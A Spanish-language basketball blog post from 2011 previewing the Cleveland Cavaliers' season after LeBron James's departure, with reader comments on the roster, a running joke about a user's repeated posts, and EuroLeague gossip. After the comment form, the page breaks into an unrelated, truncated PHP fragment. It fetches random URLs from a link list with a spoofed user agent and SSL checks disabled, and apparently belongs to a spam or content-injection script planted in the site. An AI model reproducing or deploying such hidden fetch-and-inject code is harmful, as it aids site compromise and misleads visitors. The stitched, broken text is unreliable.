Cleveland Cavaliers: Surcando los infiernos

30 de December de 2011 por Viva_Dirk

Hace 9 años, en la temporada 2002-2003, los Cavs acabaron con un balance de 17 victorias y 65 derrotas, algo que les permetiría elegir en el nº1 del draft a LeBron James. El jugador de Akron abandonó la franquicia rumbo a Miami en el verano de 2010 tras una campaña de 61 victorias y 21 derrotas. Al año siguiente, los Cavs sólo lograron 19 victorias y de nuevo se han hecho con el nº1 del draft.  Sería todo un logro repetir una trayectoria similar a la que tuvieron ‘los Cavs de LeBron’ en sus 8 años como jugador franquicia.

Las exigencias para esta temporada son mínimas y las vistas estan puestas en el enorme hueco salarial del que dispondrán este verano cuando finalice el contrato de Antawn Jamison y después de amnistiar a Baron Davis este mismo año. Así pues al comenzar esta temporada reducida, lo que los aficionados de Cleveland quieren ver es de que son capaces Kyrie Irving y Tristan Thompson, elecciones 1 y 4 del draft, respectivamente.  Seguramente veamos algun traspaso que deje a este último vía libre para jugar muchos minutos y tener claro en qué gastar el dinero.

Como decimos, Kyrie Irving va a tener protagonismo absoluto y de su rendimiento depende que la temporada sea un éxito. Mucho más que de las victorias conseguidas. Irving es un playmaker de mucha clase, con grandes dotes de dirección y muy buena muñeca. Tendremos que verle enfrentándose a bases mas físicos, aunque esto es algo que mejorará seguro. Es curioso que en una plantilla tan corta veamos al posiblemente sea el mejor base suplente de la competición, Ramon Sessions, que disputará los minutos que no juegue Irving y algunos como escolta. Es un jugador de garantías que posiblemente vuele el verano siguiente.

Las alas son un solar a la espera de lo que pueda ofrecer Omri Casspi, cuyas características podrian hacerle un hueco en el proyecto futuro de los Cavs. Daniel Gibson y Anthony Parker son de sobra conocidos. Ambos dan el nivel raspado para titulares y encajan mejor en un papel específico que como jugadores claves con mucha responsabilidad. Si no es traspasado también podemos ver minutos de Antawn Jamison como alero para dejar hueco a Tristan Thompson. Christian Eyenga debería tener poco protagonismo aunque dadas las circunstancias del equipo cualquiera que destaque mínimamente tendrá su oportunidad.

Anderson Varejao, Antawn Jamison, Tristan Thompson, Samardo SamuelsRyan Hollins se repartirán los minutos del juego interior. El brasileño es una garantía de lucha bajo los aros e intendencia a todos los niveles, uno de los favoritos de la afición ya en la anterior etapa. Una pieza de gran nivel para el futuro proyecto. A sus 35 años, Antawn Jamison, sigue siendo un anotador consistente aunque cada vez menos reboteador y peor defensor. Thompson es la otra gran esperanza. Tras su sorprendente elección en el Nº4 su importancia debe ir subiendo segun avance la temporada. En principio destaca por su agresividad tanto para atacar el aro rival como para intimidar en el propio.

Uno de los equipos que podrían parecer favoritos a ser catalogados como uno de los más aburridos del año, encuentra en Kyrie Irving y Tristan Thompson alicientes suficientes para captar el interés de los aficionados. No hay objetivos, no hay presión. Ambiente óptimo para que mejores y progresen. Su momento llegará a partir de la temporada que viene.

Quinteto titular: Kyrie Irving, Anthony Parker, Omri Casspi, Antawn Jamison, Anderson Varejao
Sexto hombre: Ramon Sessions

Pronóstico: Entre 12 y 17 victorias

Comenta

28 comentarios a esta entrada

  1. nach dice:
    #1

    Un solar.

    Aspirarán a pillar una ronda buena en el próximo draft y a que Irving y Thomson tengan minutos y crezcan.

    No creo que ni siquiera a pesar de su espacio salarial la temporada que viene puedan aspirar a traerse algo de los agentes libres poderoso a no ser que Irving y Thomson la rompan este año de forma escandalosa

      Citar

  2. melo15 dice:
    #2

    Bueno Deer,tampoco hay prisa, yo me iria un par de años abajo en el draft, y a partir de ahí si que les podemos empezar a pedir cosas, espero que el GM de los cavaliers acompañe mejor a Irving que a Lebron, porque con el lo hizo realmente mal.

      Citar

  3. melo15 dice:
    #3

    Bueno Deer,tampoco hay prisa, yo me iria un par de años abajo en el draft, y a partir de ahí si que les podemos empezar a pedir cosas, espero que el GM de los cavaliers acompañe mejor a Irving que a Lebron, porque con el lo hizo realmente mal.
    Aver como evoluciona Irving, para mi tiene potencial para convertirse en una estrella , lo tiene todo:direccion,anotacion, solo le falta un poco de fisico, pero eso ya lo ira mejorando. Sera reallmente emocionante, la lucha por el ROY, aver que base se lo lleva.

      Citar

  4. melo15 dice:
    #4

    Bueno Deer,tampoco hay prisa, yo me iria un par de años abajo en el draft, y a partir de ahí si que les podemos empezar a pedir cosas, espero que el GM de los cavaliers acompañe mejor a Irving que a Lebron, porque con el lo hizo realmente mal.
    Aver como evoluciona Irving, para mi tiene potencial para convertirse en una estrella , lo tiene todo:direccion,anotacion, solo le falta un poco de fisico, pero eso ya lo ira mejorando. Sera reallmente emocionante, la lucha por el ROY, aver que base se lo lleva. Imaginaros el Bobcats-Cavaliers, irving vs walker y biyombo vs thompson

      Citar

  5. TheDeerHunter dice:
    #5

    1) ¿Ya estás en modo Sheldon, Melo?
    2) ¿A mí que me dices??

      Citar

  6. melo15 dice:
    #6

    1-que es Sheldon?
    2-pues no los se que te digo, he tenido como un espejismo de que has hecho tu el comentario

      Citar

  7. HeiNeKeN dice:
    #7

    Totalmente surrealista la conversación xDD

    Hablando de los Cavs, creo que en el proximo draft volveran a ser de los primeros en elegir.

      Citar

  8. Sancho88 dice:
    #8

    jjajajajaj, que crack melo, q crack. oye, y ese alonsito gee que?? no dices na dirk? un tio que fue capaz de abandonar un equipo por sms se merece estar en el análisis, jajaja. no en serio, los cavs se van a ver marcados durante diez años o asi por lo de lebron. es irreconstruible un equipo que cambia a su jugador franquicia HICKSON, por una medianía, CASSPI, que solo sabe tirar, no tiene nada de actitud en la cancha, podría robar muchos balones pero es que va sin sangre, solo le interesan sus propios tiros, etc. por tanto, me parece que ahí patinaron estos niños grandilocuentemente. En fin, veremos muchos encuentros de relax del resto de equipos contra los cavaliers

      Citar

  9. Sancho88 dice:
    #9

    Por cierto, apoyo a melo, yo tampoco sé quien es sheldon

      Citar

  10. Pop dice:
    #10

      Citar

  11. melo15 dice:
    #11

    Para mi fue una cagada lo de hickson BRUTAL, ponias a hickson de ala-pivot, jamison de sexto hombre porque juega de alero tambien, fichabas a Irving en el draft, y traspasabas la 4 eleccion por una del siguiente draft que va ha ser mejor, y en vez de thompson, que es bueno, pero que tampoco es de lo mejor fichabas a drmmond y a Austin Rivers

      Citar

  12. melo15 dice:
    #12

    Para mi fue una cagada lo de hickson BRUTAL, ponias a hickson de ala-pivot, jamison de sexto hombre porque juega de alero tambien, fichabas a Irving en el draft, y traspasabas la 4 eleccion por una del siguiente draft que va ha ser mejor, y en vez de thompson, que es bueno, pero que tampoco es de lo mejor fichabas a drmmond y a Austin Rivers. Tendria que ser yo el GM de los Cavs, y todo esto no habria ni pasado porque el fallo estuvo en no acompaÑar bien a Lebrom

      Citar

  13. The wolf dice:
    #13

    melo por dios escribelo todo del tiron que llevo 8 horas leyendo los comentarios de este analisis y no avanzo xD

      Citar

  14. Sancho88 dice:
    #14

    Pop:
    http://es.wikipedia.org/wiki/Sheldon_Cooper

    Vale, lo supuse porque ayer vi un capítulo en neox y salía el pavo todo el rato llamando a una puerta y repitiendo el nombre de la persona, pero lo vi demasiado obvio, xd. el típico amigo pelma, pesao, pedante e inaguantable. pero desde fuera es gracioso, xd

      Citar

  15. Denise dice:
    #15

    Lo malo de los Cavs como de otras franquicias (new orleans, minessota, charlotte) es que nadie quiere irse a vivir a ellas, por lo que aunque tengan margen de sobra para fichar agentes libres, éstos preferiran irse a otro lado.
    La ciudad , su nivel de vida y ocio es un elemento diferenciador entre muchas franquicias, a una las marca para bien y a otras para mal. Por ejemplo, si éstos actuales Cavs jugasen en Las Vegas, un montón de agentes libres se pelearian por jugar en este equipo.

    Por tanto, a esperar a que algun buen jugador les caiga en el Draft y atraiga a agentes libres. Quizas es pronto para decirlo, pero creo que ni Irving ni Tristan podrán tener ese nivel de atraccion de otros jugadores como Lebron.

    PD: Melo, me recuerdas a Roberto Gomez. (el de Futboleros). Un tio muy pesado y cansino pero necesario en el programa para reirse con sus disparatadas ocurrencias.

      Citar

  16. HeiNeKeN dice:
    #16

    Sancho88: Vale, lo supuse porque ayer vi un capítulo en neox y salía el pavo todo el rato llamando a una puerta y repitiendo el nombre de la persona, pero lo vi demasiado obvio, xd. el típico amigo pelma, pesao, pedante e inaguantable. pero desde fuera es gracioso, xd

    Pero Sheldon tiene Sindrome de Asperger y transtorno obsesivo compulsivo, eso son enfermedades cuyos sintomas le hacen comportarse de esa forma, no es lo mismo que tener un amigo pesado xD.

    Perdón por el offtopic pero es que estoy estudiando sobre estos temas en concreto y ya que estaba xDD

    PD: Deben confiar en Samardo, el sabrá que hacer

      Citar

  17. Pop dice:
    #17

    Sancho88: Vale, lo supuse porque ayer vi un capítulo en neox y salía el pavo todo el rato llamando a una puerta y repitiendo el nombre de la persona, pero lo vi demasiado obvio, xd. el típico amigo pelma, pesao, pedante e inaguantable. pero desde fuera es gracioso, xd

    Bueno, no creo que Deer lo dijera por pesado ni pelmazo ni nada de eso, sino más bien por la incapacidad de melo de pillar un sarcasmo.

    Yo ya lo he dicho: a mí melo me irrita y me simpatiza a partes iguales, la verdad es que sus comentarios le dan sabor al blog xD.

      Citar

  18. Txusma dice:
    #18

    En realidad Deer lo dice por lo de repetir 3 veces el comentario y es que todos los que hayáis visto alguna vez ‘The Big Bang Theory’ sabéis como llama Sheldon a la puerta de Penny.
    Por cierto, os recomiendo la serie. Para mi la mejor cómica de los últimos años.

    Y si que interesan poco los Cavs, no? 😀

      Citar

  19. Nacho dice:
    #19

    Txusma: P>Y si que interesan poco los Cavs, no?

    Pues yo los he metido en playoffs (¡Ah, no!, eso fue el año pasado, este ha sido Toronto, xD, algún año daré con la coña)

      Citar

  20. The wolf dice:
    #20

    Ya que veo que no interesan mucho los cavs lanzo una pequeña pregunta… he estado echando un ojo a los agentes libres con mas nombre que estan sin equipo y os pregunto…cuales os parecerian adecuados para este proyecto de los cavs o incluso para otro que pinte igual o peor…

    entre esos nombres estan Iverson y Arenas (los 2 en un vestuario para montar tiroteos tras los entrenos), keith boogans (titular 82 partidos año anterior), kirillenko, nate robinson, Al thornton ( mi favorito…debe de tener algo oscuro porque sino no me lo explico..), Posey, Leon powe, Eddi house y Przybilla por ejemplo ea ahi queda dicho…

      Citar

  21. Denise dice:
    #21

    Iverson y Arenas no por favor!

    Y del resto, exceptuando Kirilenko, si están en esa situación es por algo.
    Bogans, Thornton y Przybilla son interesantes para completar plantilla. Powe creo que tiene las rodillas destrozadas, y el resto ni en pintura.

      Citar

  22. Txusma dice:
    #22

    Kirilenko se queda en Europa según el CSKA.

      Citar

  23. Sancho88 dice:
    #23

    mira, se confirma finalmente. Ya salió que era su intención quedarse, pero la gente no daba demasiado crédito. Me parece una gran noticia para el baloncesto europeo, que no todo es NBA. Una gran noticia para la euroliga y CSKA máximo candidato al título

      Citar

  24. Denise dice:
    #24

    Txusma:
    Kirilenko se queda en Europa según el CSKA.

    Pues ya tenemos final de la Euroliga Barça vs CSKA
    Kirilenko, Shved, Teodosic, Krstic, Khriapa, Kaun, Siskauskas…que equipazo! Sólo les falta un americano en condiciones porque el Gordon Jamont me parece un paquete dado el presupuesto que maneja el equipo ruso

      Citar

  25. melo15 dice:
    #25

    Oye yo no soy un plasta.
    Tan bueno es kirilenko

      Citar

  26. Jose Luis dice:
    #26

    Melo, desde que has llegado al blog aumentan los comentarios, y todos tenemos que aportar. No era plasta en plan mal hombre 🙂 es que a veces pones el mismo comentario tres veces, cambiando o añadiendo una frase. Termina el comentario y luego lo mandas hombre jajajaja

      Citar

  27. melo15 dice:
    #27

    Esque el mobil va mal!!!!
    Os lo explico, yo lo envío, y me sale algo de que no hay conexion, entonces yo no se si lo he enviado o no.

      Citar

  28. Jose Luis dice:
    #28

    jajajajaja poobre. Va anda, si todos nos reímos para bien, no te preocupes hombre 🙂

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>